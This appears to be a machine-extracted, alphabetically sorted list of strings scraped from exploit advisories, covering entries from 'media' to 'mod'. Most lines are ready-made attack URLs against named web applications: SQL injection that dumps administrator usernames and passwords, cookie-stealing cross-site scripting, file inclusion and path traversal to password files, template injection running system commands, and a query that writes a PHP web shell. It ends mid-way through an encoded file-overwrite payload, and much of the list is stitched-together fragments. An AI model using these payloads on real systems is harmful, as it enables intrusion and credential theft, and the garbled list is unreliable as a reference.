media?internalname=%20%22onmouseover=%22alert%28
media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser
media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser
media-library-categories
media_manager
media.php?id=-999+UNION+All+SELECT+1,version(),3,4,5,6,7
media-rss.php?mode=%3Cscript%3Ealert(1)%3C
media-script  ]
media_script.html
mediawiki
mediawiki-init.php?gfplugins=[Shell]
Medi-QnA
Medi-QnA.php
meditate
meditate_2.0
medium
medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,2,3,4,SuUser,SuPwd,6+FROM+sysuser+WHERE+SuID=1
medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,version(),database(),version(),user(),database(),7
meeting
Meetings
megacheatz_1.1.html
megafilemanager
/?MegaFileManager
megaupload
meinlogo.inc.php?action=upload';
meltingicefs
member
Member_Admin
member_cp.php, edit your avatar and put:
MEMBER?D" enctype="multipart
member_details.php?mid=1+and+substring(@@version,1,1)=4 False
member_details.php?mid=1+and+substring(@@version,1,1)=5 True
memberID=([0-9]+).*memberPassword=([0-9a-f]+)
memberid=1
Member_images
member.inc.php?install_root=[Shell]
memberlist
memberList.inc.php
memberlist.php
memberlist.php?action=profile&id=1[SQL] 
memberlist.php?ascdesc=desc&field=name&perpage=(SQL)
memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C
memberlist.php?sort=&pow=[SQL]
memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C
memberlist.php?usersearch=%'[sql_query]
memberlogin.php
member_photo.php?send=pht_inserted
member.php
member.php">
member.php?action=do_login&username=[usrname]&password=[pass]&url="><script>alert(1);<
member.php?action=list&page=1&sortorder=[SQL]
member.php?action=list&page=1&sortorder=username&perpage=[SQL]
member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');<
member.php?action=login : username='[SQL INJECTION]
member.php?action=mailform&user_id=366&sessionid=[SQL]
member.php?action=passwdsend&resetid=blah&id=2[SQL]
member.php?action=profile&UID=1%20<something>
member.php?action=profile&uid=817599
member.php?action=showprofile&user_id=1
member.php?action=showprofile&user_id=[ID]
member.php?action='[SQL Injection]
member.php?Action=viewprofile&username=<script>JavaScript:alert(document.cookie);<
member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1
member.php?action=viewpro&member=%3Cdiv%3E%3Cfont%20color=%22red%22%3EMarc%3C
member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C
member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C
member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C
member.php?id=-9999'
member.php?id=[SQL Injection]
member.php&letter=phuket'%20AND%20MID(user_pw,1,1)='8'
member.php?member=admin&act=page&id='
member.php?member=anon
member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users
member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users
member.php?pcpage=showmember&memberid=[SQL]
member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
member.php?u=4
member.php?uname=devilscream
member.php?uname=[YOUR_USERNAME]
member.php?vwar_root=[Shell-code]?&cmd=ls
member_pictures
members
Members
MembersAreaManager
membership
Membership_Site_Script_with_initial_content_to_offer_to_your_members.html
members.lycos.co.uk
members.php?action=signup \r\n";
members.php?act=view&p=conf.php&dir=
members.php?act=view&p=passwd&dir=..
members.php?browse=recent&n='1
members.php?form1_keyword=%27SQL_CODE_HERE&form1_data=pg%3Dverpobs%2Cfrom%3D0%2Cnm%3DActive+Cities%2Cid_account%3D3&form1_phpform_sent=1
members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users
members.php?memid=1 union all select 1,2,concat_ws(0x3a,admin_username,admin_password,admin_email),4,5,6,7 from config--
members.php?memid=1 union all select 1,2,concat_ws(0x3a,db_username,db_password,db_name,db_host),4,5,6,7 from config--
members.php?op=membersBills&y=-2007%27
members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16
members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users
memberspics
members_search.php
memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users
memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users
memberviewdetails.php?id=
membre
membres.lycos.fr
membres.php  (you Can Upload your Evil)
membri
membris
MemcachedStore.php?_ENV[asicms][path]=
memo.php?itemID=1[SQL]
Memorials
mem.php?mid=1[SQL]
mem-play-song-cnt.php?plid=23[CODE]
mem_videos-play-cnt.php?vdoid=41[CODE]
meneger.php?fold=
mensajeitor.php">
mensaje.php?m=<script>alert(
mention.class.php?path_om=[Shell]
menu
menu.asp
menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201 
menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
menu.aspx
menu.aspx                      #
menu.aspx            #
/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1
menu.class.php?system_path=[evil_scripts]
/?menu=download
menu_dx.php?BANNER_Url="><script>alert(document.cookie)<
menu_dx.php?IMAGES_Url="><script>alert(document.cookie)<
menu_dx.php?L_InsertCorrectly=<script>alert(document.cookie)<
menu_dx.php?L_MENUDX_InsertEMail=<script>alert(document.cookie)<
menu_dx.php?L_MENUDX_Login=<script>alert(document.cookie)<
menu_dx.php?L_MENUDX_Password=<script>alert(document.cookie)<
menu_dx.php?L_MENUDX_Registration="><script>alert(document.cookie)<
menu_dx.php?L_MENUDX_Username=<script>alert(document.cookie)<
menu_dx.php?L_MENUSX_Newsletter=<script>alert(document.cookie)<
menu_dx.php?L_Ok=<script>alert(document.cookie)<
menu_dx.php?SITE_Path=..
menu-functions
menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> 
menu.mdb
/?menu=photos&index=1&imagedir=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B<
/?menu=photos&index=1&imagedir=images%2F&currentdir=images%2F&imageperpage=9&page=1--><ScRiPt%20%0d%0a>alert(213771818860)%3B<
menu.php
menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
menu.php <= Click T.l.chargez phpMyPortal
menu.php? CONFIG[AdminPath] =[SHELL]
menu.php?conf[lang]= [LFİ]
menu.php?functions_file=[SHELL]
menu.php?GLOBALS[g_campsiteDir]=[SHELL]
menu.php?libdir=[lfi]
menu.php?root_path=[evil_scripts]
menus
menus.php
menu_sx.php?CONTENTS_Dir=..
menu_sx.php?IMAGES_Url="><script>alert(document.cookie)<
menu_sx.php?L_InsertNOK3Char=");}<
menu_sx.php?L_MENUSX_Archive=<script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Channels=<script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Chat="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Community="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Contacts="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_ContactUs="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Downloads="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_ECards="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Forum="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Guestbook="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Home=<script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Links="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Login="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Logout="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Membership="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Newsletter="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Nicknames="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_PasswordForgot="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Polls="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_Services="><script>alert(document.cookie)<
menu_sx.php?L_MENUSX_UserProfile="><script>alert(document.cookie)<
menu_sx.php?L_Ok=<script>alert(document.cookie)<
menu_sx.php?L_Search=<script>alert(document.cookie)<
menuXML.php' %(host)
Merak
merchandise.php?type=<script>alert(document.cookie)<
merchant.ihtml?id=56&step=[SQL]
merchant.ihtml?id=[SQL]
merchant.ihtml?pid=[SQL] 
merchant_product_list.php?merchant_id=[sqli]
merchants
Mercury
mercuryboard
mercurycs.co.za
merge.php?GlobalSettings[templatesDirectory]=evill
meridian
mesh.dl.sourceforge.net
MessageBoard
messageboard.php" enctype="application
messageboard.php?thread=1 AND 1=0
messageboard.php?thread=1+AND+1=0 --> FALSE
messageboard.php?thread=1 AND 1=1
messageboard.php?thread=1+AND+1=1 --> TRUE
messagebox
message_box.html
message_box.php?sort_mode=[SQL]
message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
message_box.php?theme=&l=[USERNAME]&x=[SQLi]          
message_box.php?theme=&l=[USERNAME]&x=[SQLi]           
message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
message_class.php?pfadhier=..
message_class.php?pfadhier=[Local
message-delete.php3?BSX_LIBDIR=<br>"
message-forward.php3?BSX_LIBDIR=<br>"
message-header.php3?BSX_LIBDIR=<br>"
message.php">
message.php?action=delete&pmid=[SQL-STATEMENT]
message.php?action=showfolder&folderid=[SQL-STATEMENT]
Message.php?_ENV[asicms][path]=
message.php" method="post">
message-print.php3?BSX_LIBDIR=<br>"
message-read.php3?BSX_LIBDIR=<br>"
message-replyall.php3?BSX_LIBDIR=<br>"
message-reply.php3?BSX_LIBDIR=<br>"
messages
message-search.php3?BSX_LIBDIR=<br>"
message_send.php?quote=[ID]
message_send.php?tid=%22><script>alert(document.cookie)<
messages.inc.php?include_path=[darkcode]			[»]
messages.php
messages.php?aaaaaaaaaaa[256]aaaa
messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20
messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
messages.php?idp=[exploit]
messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user
messages.php?msg_send=0" method="post">
messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'
messages.php?msg_view=' 
messaging
messaging_show_folder_content.php?we_transaction=%22;}alert%280%29;{
messenger
Messenger.php?pag=-1%27%20union all select id from pharming--
met001
meta
[metajour_path]
meta=lastcom
meta.php?nuke_url="><script>alert(document.cookie)<
metasearch
metering.php?ID=11+[SQL-INJECTION!]--%20-&MONTHS=1
method
" method="post">
"; method="post">
" method="POST">
" method="post" enctype="multipart
" method="post" name="main">
" method="post" name="main" >
" method="post" name="main" enctype="multipart
methods
metinfo
meto5757.by.ru
metropolis.fr.cr
mf
mfa_theme.php?tpls[1]=[[Sh3LL
mfh12
&m_for_racine=<
[mforum_path]
mg2
mgsdl.free.fr
mg_user_fot
mg_user_fotoalbum_panel
Mi4night
miclen.xtreme-corp.net
microblog
microcms
[micro_cms]
micro-cms
microcms-admin-home.php',$post);
micro-cms-content-management-demo.php
micro_cms_files
microcms-include.php?microcms_path=[evil scripts]
microcms-include.php?microcms_path=[FileInclusion]%00
micro_cms_path
microtopic
microUpload.php
mid
(mID='1
/?mid=41&m2id=42&page=1&c_id=[SQL] 
/?mid=41&m2id=42&page=1&faq_id=[SQL]
middle_east_and_asia
MidiCart-PHP-Shopping-Cart
mieric
mietshop.php
migrateNE2toNE3.php?_NE[AbsPath]=[shell]
Mihalis
milesj.me
milesj-php-decoda
million
millionpixels3.php
milw0rm.deltahacking.net\r\n";
milw0rm.org
milw0rm.ws
mim.infinix.it         				     			     |
mim.infinix.it								     |
mimsy_xg
minb
minba
minbank
minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
minb.sf.net                                                          #
mindmeld.sourceforge.net
mindreantre.se
minerva
[Minerva_path]
mingle-forum
/?mingleforumaction=editpost&t=1.0&id=0%20UNION%20SELECT%201,2,3,4,5,6,7%20%23
/?mingleforumaction=editpost&t=1.0&id=<target
minibb
minibbtable_users
minibill
[mini_blog_1.0.1_path]
minibloggie
[miniBloggie]
mini_blog.htm
mini-cms
[mini_cms_1.0.1_path]
miniCMS-2.0
mini_cms.htm
minicmsribafs
mini-file-host
minifile.rar
mini-mail-dashboard-widget
mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)
minimal-ablog
minimaldesign.net
minimal-gallery                         
mini.php?help_file=[file]
mini.php?help_file=[LFI]%00
MiniPort@l
mini-pub
mini-pub.php
mini-pub.sourceforge.net
minishowcase.frwrd.net
minitt
minitwitter
miniuploader
miniweb2
mint
minutes
mi.php?ID=5
miplex2
[miplex2_paht]
mirror.freepbx.org
mirror.in.th
mirrors
mirror.vocabbuilder.net
misc
misc.add-edit.php
miscellaneous
Miscellaneous
misc.list.php
misc.php
misc.php?action=getlastpost&userid='[SQL] 
misc.php?action=hmflags&cnam=Belgium'&pf=5
misc.php?action=hmflags&cnam=-Belgium'+UNION SELECT 1,group_concat(username,0x3a,password,0x3a,salt,0x3b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164+FROM+mybb_users WHERE uid=1--+&pf=5
misc.php?action=logout" alt="Do you see this?" 
misc.php?action=php_info
misc.php?action=rules&fid=-1' [SQL]
misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C
misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C
misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C
misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=..
misc.php?do=deletemail&mail="><script>alert('Sec-w.com')<
misc.php?do=page&template={${phpinfo()}}
misc.php?do=page&template={${system(id)}} 
misc.php?email=2">
misc.php?profile=1&id=2 (to confirm is it infected)
misc.php?section=pun_pm&pmpage=write&message_id=-1'
misc.php?sid=yoursessionid&action=workingtop&taskname=Backup%20Database&percent=<script>aler(document.cookie)<
misc.php?sub=memberlist&page=-11111111111111111
misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C
misc.php?sub=memberlist&page=-1.11111111111111E+FF
misc.php?sub=memberlist&page=[LAST_PAGE]
misc.php?sub=profile&uid=[code]
misc.php?sub=profile&uid=$user_id");
misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r
misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
misc.php?tips=newtip
missing.php?header_prog=[Evil_Script]
mission.class.php?path_om[Shell]
mitglied.lycos.de
mixedcms
mk_3_test.Php.mk
mkportal
mkportal.1.2.1
mlecsphp
mlm_auction.html
MLM.html
mlodylis.xcx.pl
mls
[MM]
mmailer
MMchat
mmetince
mm-forms-community
mmorpg-zone-sell-mmorpg-online.html
mms.pipp.no
mmsv2
/?mn=admin.message.error">
mnews
mnews\n";
mnews-sistema-de-noticias
mng-search.php?username=<script>alert(document.cookie);<
 m$n: mikeX[at]fuckoff[dot]com
mNt.php
moagallery
moaub-15-php-microcms-1-0-1-multiple-remote-vulnerabilities
moaub-17-phpmyfamily-multiple-remote-vulnerabilities
moaub-18-cmsimple-xsrf-vulnerability
moaub-26-zenphoto-config-update-and-command-execute-vulnerability
moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability
moaub-7-dynpage-multiple-remote-vulnerabilities
moaub-9-festos-cms-2-3b-multiple-remote-vulnerabilities
mobile
mobile-addon
mobilecartly
mobius.asp ]
mobius_path
mod
/?mod=..
mod-Areafiles-display-lid-510-cid-1.phtml
/?mod=category&id_ctg='SQL_INJECTION&PHPSESSID=b1267b894a93572928850920df08126d 
mod_cbsms_messages.php?mosConfig_absolute_path=[evil script]
mod_chatting
modcp
modcp.php?action=post_del&x=6&y='SQL_CODE_HERE 
modcp.php?action=post_del&x='SQL_CODE_HERE
moddb
/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/?mode=download
model-agency-manager-pro.phpmodelagencyscript.com
model-agentur-p-269.html AND
model-agentur-v2-p-420.html
model.php
models
moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid
moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie>
moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1
moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form
moderate.php?get_host[]=
moderation.php?includes_directory=[INDONESIANCODER]
moderation.php?posts=[firstpid]|[secondpid]?[SQL]
moderator
moderator.php?action=lock&TID=LIDDUFORUM&ismod=1
modern5
modern5 ]
modernbill
&mode=smilies 
/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config
*&mode=view_user&
mod_file
/?mod=files
mod_flatmenu.php?mosConfig_absolute_path=';
mod_forum
MOD_forum_fields_parse.php?phpbb_root_path=FILE  
mod:fs
mod_gallery_funcs.php?MOA_PATH=[AvriLhea]          
mod_gazetteer_edit.php?gaz= 1 LIMIT 0 UNION 
mod_gazetteer_edit.php is shown.
mod_googlecurrencyconverter
modif
modif_config.php
modificatif.class.php?path_om=[Shell]
modifications-3-8-x
modifier.date_format.php
modifpost.php?id=[SQL]  (shoud have access to admin area "use my last JBlog Xploit")
modifyAsset
modify_go.php?pwfile=[shell]
modifynetform.php?name=' union select
modify.php?installed_config_file=[Evil Script]
modify.php?page=pages
modify.php?pwfile=[shell]
modifypluginsidform.php?plugin_id=1001'&sid=1
modifypluginsidform.php?plugin_id=1001&sid=1'
modifyportform.php?portname=ANY'%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login='admin
modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post 
mod_image_funcs.php?MOA_PATH=[AvriLhea]          
modlink.php?lid=2+DSecRG_INJECTION
/?mod=login&op=modprof&user=[username]
mod_media
mod_mime.html
mod_mime.html#multipleext
mod_myaccount.php?pixie_user=DSecRG&m=..
mod_myaccount.php?pixie_user=DSecRG&x=..
mod.php?Action=Add">
mod.php?id='>&lt;script&gt;alert(document.cookie)&lt;
mod.php?id='[SQL Injection] 
mod.php?mod=
mod.php?mod=..
mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul 
mod.php?mod=blog&modfile=archive&month=8&year=2&start=[sqli]
mod.php?mod=blog&modfile=archive&month=8&year=[sqli]
mod.php?mod=blog&modfile=archive&month=[sqli]
mod.php?mod=blog&modfile=list&catid=4&start=[sqli]
mod.php?mod=blog&modfile=tags&tag=features&start=[sqli]
mod.php?mod=blog&modfile=viewpost&blogid=26&start=[sqli]
mod.php?mod=blog&start=[sqli]
mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0
mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors
mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200,0,'<? system($cmd)?>',0,0,0,0%20from%20authors into outfile '
mod.php?mod=download&op=manager&isadmin=1
mod.php?mod=<evil_code>
mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
mod.php?mod=helpdesk&mode=new
mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php      #
mod.php?mod=html&modfile=show&file=..\File.Type                 #
mod.php?mod=informasi&op=showinfo&intypeid= ><script>document.write(document.cookie)<
mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1
mod.php?mod=[LFI]
mod.php?mod=[LFI]%00#
mod.php?mod=mail&mode=reset&w=user
mod.php?mod=newsfeed&op=manager&isadmin=1
mod.php?mod=pages&mode=list&dcat_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b 
mod.php?mod=pages&mode=list&dtopic_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b
mod.php?mod=poll&modfile=add"; method="post" name="add_poll" 
mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]
mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C
mod.php?module=..
mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+
mod.php?mod=userpage&menu=130105&page_id=[BLIND]
mod.php\", \"w+\"); fwrite ($r0x, urldecode(\"%3C%3Fphp%0A%0Aif(!defined('CHECK'))+%7B+exit%3B+%7D%0A%0Arequire(%24mod_root.%22%2Fconfig.php%22)%3B%0A%0A%24id+%3D+strip_dir_illegals(%24id)%3B%0A%0Aif((!isset(%24do))+%7C%7C+(%24do+%3D%3D+%22%22))+%7B%0A%0Arequire(%24mod_root.%22%2Fcategories.php%22)%3B%0A%0Aif((!isset(%24cat))+%7C%7C+(%24cat+%3D%3D+%22%22))+%7B%0A%0A%24list+%3D+%24categories%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24list+%3D+%24subcat%5B%22%24cat%22%5D%3B%0A%0A%7D%0A%0A%2F%2F+Count+Files+%2F%2F%0A%0A%24count_incat+%3D+array()%3B%0A%0A%24dir+%3D+%24mod_root.%22%2Ffiles%22%3B%0A%0A%24handle+%3D+opendir(%24dir)%3B%0A%0Awhile(%24file+%3D+readdir(%24handle))+%7B%0A%0A%24loc+%3D+%24dir.%22%2F%22.%24file%3B%0A%0Aif(!is_dir(%24loc))+%7B%0A%0Aif(strrchr(%24file%2C%22.%22)+%3D%3D+%22.php%22)+%7B%0A%0Ainclude(%24loc)%3B%0A%0A%24count_incat%5B%22%24fs_category%22%5D%2B%2B%3B%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0A%2F%2F+End+%2F%2F%0A%0Aecho+%22%3Cdiv+align%3D%5C%22right%5C%22%3E%3Ctable+%24sp_table%3E%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%5C%22%24mod_url%5C%22%3EDownloads%3C%2Fa%3E+%26gt%3B+Browse%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fdiv%3E%3Cbr+%2F%3E%22%3B%0A%0Aif(%24list+!%3D+%22%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+%24sp_htd%3ECategories%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%24arr+%3D+explode(%22%7C%7C%22%2C%24list)%3B%0A%0Anatcasesort(%24arr)%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(%24single+!%3D+%22%22)+%7B%0A%0A%24arrx+%3D+explode(%22%26%26%22%2C%24single)%3B%0A%0A%24desc+%3D+%24cat_description%5B%22%24arrx%5B1%5D%22%5D%3B%0A%0A%24inner_count+%3D+count(explode(%22%7C%7C%22%2C%24subcat%5B%22%24arrx%5B1%5D%22%5D))+-+1%3B%0A%0A%24inner_out+%3D+%22%22%3B%0A%0Aif(%24inner_count+%3C%3D+0)+%7B+%24inner_count+%3D+0%3B+%7D%0A%0Aelse+%7B%0A%0A%24inner_out+%3D+%22%7C%7C+%3Cb%3ESub+Categories%3A%3C%2Fb%3E+%24inner_count%3C%2Fi%3E%22%3B%0A%0A%7D%0A%0A%24incat+%3D+%24count_incat%5B%22%24arrx%5B1%5D%22%5D%3B%0A%0Aif(%24incat+%3D%3D+%22%22)+%7B+%24incat+%3D+0%3B+%7D%0A%0Aif(%24desc+!%3D+%22%22)+%7B+%24desc+%3D+%24desc.%22%3Cbr+%2F%3E%22%3B+%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3E%3Ca+href%3D%22%24mod_url%26cat%3D%24arrx%5B1%5D%22%3E%24arrx%5B0%5D%3C%2Fa%3E%3C%2Fb%3E%3Cbr+%2F%3E%0A%0A%24desc%0A%0A%3Cb%3EFiles%3A%3C%2Fb%3E+%24incat+%24inner_out%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0A%7D%0A%0Aecho+%22%3C%2Ftable%3E%3Cbr+%2F%3E%22%3B%0A%0A%7D%0A%0A%24out_files+%3D+%22%22%3B%0A%0A%24count_files+%3D+0%3B%0A%0A%24dir+%3D+%24mod_root.%22%2Ffiles%22%3B%0A%0A%24handle+%3D+opendir(%24dir)%3B%0A%0Awhile(%24file+%3D+readdir(%24handle))+%7B%0A%0A%24loc+%3D+%24dir.%22%2F%22.%24file%3B%0A%0Aif(!is_dir(%24loc))+%7B%0A%0Aif(strtolower(strrchr(%24file%2C%22.%22))+%3D%3D+%22.php%22)+%7B%0A%0Arequire(%24loc)%3B%0A%0A%24count_files%2B%2B%3B%0A%0Aif(%24fs_category+%3D%3D+%24cat)+%7B%0A%0A%24name+%3D+str_replace(%22.php%22%2C%22%22%2C%24file)%3B%0A%0A%24f_size+%3D+filesize(%24mod_root.%22%2Fuploads%2F%22.%24name)%3B%0A%0A%24out_website+%3D+%22(none)%22%3B%0A%0Aif(%24fs_website+!%3D+%22%22)+%7B%0A%0Aif(strpos(%24fs_website%2C%22%2F%22)+%3D%3D+false)+%7B+%24fs_website+%3D+%22http%3A%2F%2F%22+.+%24fs_website%3B+%7D%0A%0A%24out_website+%3D+%22%3Ca+href%3D%5C%22%24fs_website%5C%22%3EVisit%3C%2Fa%3E%22%3B%0A%0A%7D%0A%0A%24desc+%3D+add_spcode(%24fs_description)%3B%0A%0A%24out_files+.%3D+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3E%3Ca+href%3D%22%24mod_url%26do%3Dview%26id%3D%24name%22%3E%24fs_product%3C%2Fa%3E%3C%2Fb%3E%3Cbr+%2F%3E%0A%0A%24desc%3Cbr+%2F%3E%0A%0A%3Cb%3ESize%3A%3C%2Fb%3E+%24f_size+%7C%7C+%3Cb%3EPublisher%3A%3C%2Fb%3E+%24fs_publisher+%7C%7C+%3Cb%3EWebsite%3A%3C%2Fb%3E+%24out_website%3Cbr+%2F%3E%0A%0A%3Cb%3EDate+Posted%3A%3C%2Fb%3E+%24fs_date+%7C%7C+%3Cb%3EDownloads%3A%3C%2Fb%3E+%24fs_downloads+%7C%7C+%3Cb%3ERating%3A%3C%2Fb%3E+%24fs_rating%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0Aif((isset(%24cat))+%7C%7C+(%24cat+!%3D+%22%22))+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+%24sp_htd%3EFiles%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%24out_files%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aecho+%22%3Cdiv+align%3D%5